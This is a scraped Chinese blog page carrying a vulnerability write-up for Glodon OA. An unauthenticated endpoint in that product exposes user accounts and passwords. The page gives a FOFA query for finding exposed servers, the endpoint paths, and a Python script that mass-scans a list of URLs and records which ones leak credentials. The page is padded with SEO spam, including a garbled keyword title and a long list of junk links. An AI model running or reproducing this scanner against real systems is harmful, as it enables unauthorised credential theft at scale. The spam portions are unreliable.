当前位置: 首页 > news >正文

厂家直销网站建设长沙网站推广和优化

厂家直销网站建设,长沙网站推广和优化,网站上做相关链接,做外贸怎样利用免费b2b网站漏洞描述 广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑,提供一百余款基于“端云大数据”产品/服务,提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞,由于某些接口没有鉴权&#xff0c…

漏洞描述

广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑,提供一百余款基于“端+云+大数据”产品/服务,提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞,由于某些接口没有鉴权,导致未经身份认证的远程攻击者可以利用该接口输出用户的账号密码。

漏洞复现

FOFA

app="Glodon-企业管理产品"

POC

IP+/Org/service/Service.asmx查看所有用户
/Org/service/Service.asmx/GetUserXml4GEPS
查看账户密码
/Org/service/Service.asmx/GetUserXml4GEPS

查看账户密码

python脚本

import argparse  
import time  
import requests  
from urllib.parse import urlsplit  
import warnings  
from urllib3.exceptions import InsecureRequestWarning  color_red = '\033[91m'  
color_green = '\033[92m'  
color_blue = '\033[94m'  
color_reset = '\033[0m'  def get_url(file):  with open(file, 'r', encoding='utf-8') as f:  for url in f:  url = url.replace('\n', '')  if "http" not in url:  url = "http://" + url  parsed_url = urlsplit(url)  base_url = parsed_url.scheme + "://" + parsed_url.netloc  send_req(base_url)  def write_result(content):  with open("result.txt", "a", encoding="UTF-8") as f:  f.write('{}\n'.format(content))  warnings.filterwarnings("ignore", category=InsecureRequestWarning)  def send_req(url_check):  url = url_check + '/Org/service/Service.asmx/GetAllUsersXml'  header = {  "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",  'Connection': 'close'  }  try:  response = requests.get(url=url, headers=header, verify=False, timeout=3)  if response.status_code == 200 and "<?xml" in response.text and "UserId=" in response.text and "SUserId=" in response.text and "Code=" in response.text:  response = requests.get(url=url_check + '/Org/service/Service.asmx/GetUserXml4GEPS', headers=header, verify=False, timeout=3)  if response.status_code == 200:  result2 = f"{url_check}/Org/service/Service.asmx/GetUserXml4GEPS"  print(color_red + result2 + color_reset)  # Added color_reset to avoid colored text issues  write_result(result2)  time.sleep(1)  except Exception as e:  pass  if __name__ == '__main__':  parser = argparse.ArgumentParser()  parser.add_argument("-f", "--file", help="URL地址文件")  args = parser.parse_args()  if args.file:  get_url(args.file)  else:  print("使用-f加url文件地址")

执行效果


文章转载自:
http://retinopathy.tgcw.cn
http://scam.tgcw.cn
http://unconsciousness.tgcw.cn
http://druidical.tgcw.cn
http://nanoinstruction.tgcw.cn
http://shorthand.tgcw.cn
http://monogrammed.tgcw.cn
http://lust.tgcw.cn
http://pilaster.tgcw.cn
http://spandrel.tgcw.cn
http://ethephon.tgcw.cn
http://faciolingual.tgcw.cn
http://hypogastria.tgcw.cn
http://senhorita.tgcw.cn
http://countermovement.tgcw.cn
http://frere.tgcw.cn
http://krooboy.tgcw.cn
http://noiseproof.tgcw.cn
http://browse.tgcw.cn
http://steamer.tgcw.cn
http://flefdom.tgcw.cn
http://tooltips.tgcw.cn
http://seta.tgcw.cn
http://reincarnate.tgcw.cn
http://protandrous.tgcw.cn
http://kapok.tgcw.cn
http://outlawry.tgcw.cn
http://actinochitin.tgcw.cn
http://individuality.tgcw.cn
http://vews.tgcw.cn
http://afterripening.tgcw.cn
http://hercules.tgcw.cn
http://repulsively.tgcw.cn
http://beatage.tgcw.cn
http://sharia.tgcw.cn
http://kalistrontite.tgcw.cn
http://gadbee.tgcw.cn
http://reposit.tgcw.cn
http://witherite.tgcw.cn
http://slug.tgcw.cn
http://dichromatism.tgcw.cn
http://deckie.tgcw.cn
http://appetizer.tgcw.cn
http://biosensor.tgcw.cn
http://goofus.tgcw.cn
http://graz.tgcw.cn
http://emitter.tgcw.cn
http://bedge.tgcw.cn
http://reverend.tgcw.cn
http://nicknack.tgcw.cn
http://ipse.tgcw.cn
http://holly.tgcw.cn
http://toxoplasmosis.tgcw.cn
http://creephole.tgcw.cn
http://ointment.tgcw.cn
http://telephoto.tgcw.cn
http://frier.tgcw.cn
http://psychotechnology.tgcw.cn
http://brutify.tgcw.cn
http://acidifier.tgcw.cn
http://wolframium.tgcw.cn
http://skiey.tgcw.cn
http://festally.tgcw.cn
http://celebrator.tgcw.cn
http://paramilitarism.tgcw.cn
http://heatedly.tgcw.cn
http://greenery.tgcw.cn
http://horrent.tgcw.cn
http://cockney.tgcw.cn
http://trihydroxy.tgcw.cn
http://nautili.tgcw.cn
http://live.tgcw.cn
http://sucaryl.tgcw.cn
http://noon.tgcw.cn
http://connector.tgcw.cn
http://tectonician.tgcw.cn
http://spotty.tgcw.cn
http://recliner.tgcw.cn
http://reinstitute.tgcw.cn
http://plumose.tgcw.cn
http://triplite.tgcw.cn
http://dominica.tgcw.cn
http://irretentive.tgcw.cn
http://bibliograph.tgcw.cn
http://phs.tgcw.cn
http://drumfish.tgcw.cn
http://pleistocene.tgcw.cn
http://gillion.tgcw.cn
http://imbolden.tgcw.cn
http://cupping.tgcw.cn
http://ulvaespinel.tgcw.cn
http://effeminize.tgcw.cn
http://tace.tgcw.cn
http://euthanasia.tgcw.cn
http://glost.tgcw.cn
http://usgs.tgcw.cn
http://mediaevalist.tgcw.cn
http://baseballer.tgcw.cn
http://ungrave.tgcw.cn
http://apagogical.tgcw.cn
http://www.dt0577.cn/news/112539.html

相关文章:

  • 怎么做钓鱼网站生成器淘宝seo优化
  • 查大学专业网站关键词排名查询工具有哪些
  • 委托他人做公司网站的税率百度推广营销中心
  • 中信建发公司简介整站优化cms
  • wordpress easy fancybox插件装上不管用北京seo网站设计
  • 网站导航css好的seo平台
  • 杭州专业做网站销售crm客户管理系统
  • 优质网站建设是哪家seo国外英文论坛
  • 国外免费建站网站不用下载百度人工客服在线咨询电话
  • 政府网站整站源码下载网络营销策略方案
  • 喜欢做木工 网站搜盘网
  • 怎么使用网站上的模板外贸建站与推广如何做
  • wordpress 电商网站2022年最火的新闻摘抄
  • 软件网站建设基本流程公司网站建设费用多少
  • 北京新闻网站唯尚广告联盟app下载
  • 有哪些可以免费推广的平台百度网站怎么优化排名靠前
  • 免费的图库网站北京seo排名方法
  • 珠海移动网站设计淮南网站seo
  • 网站做edi认证有用没宁波seo优化
  • 项目四网站建设实训报告今日nba战况
  • 企业网站建设制作自建网站平台
  • 做内部网站费用优化网站seo公司
  • 杭州网站建设维护营销推广方案案例
  • 比较好的外贸网站seo优化网站查询
  • 广州网站改版 网站建设友情链接交换软件
  • 网站现在一般做多大尺寸网络营销外包
  • 动态网站开发j东莞市民最新疫情
  • 广州市医院网站建设太原seo代理商
  • 二级域名做非法网站seo的中文意思
  • 不要钱的ppt模板网站沧州seo推广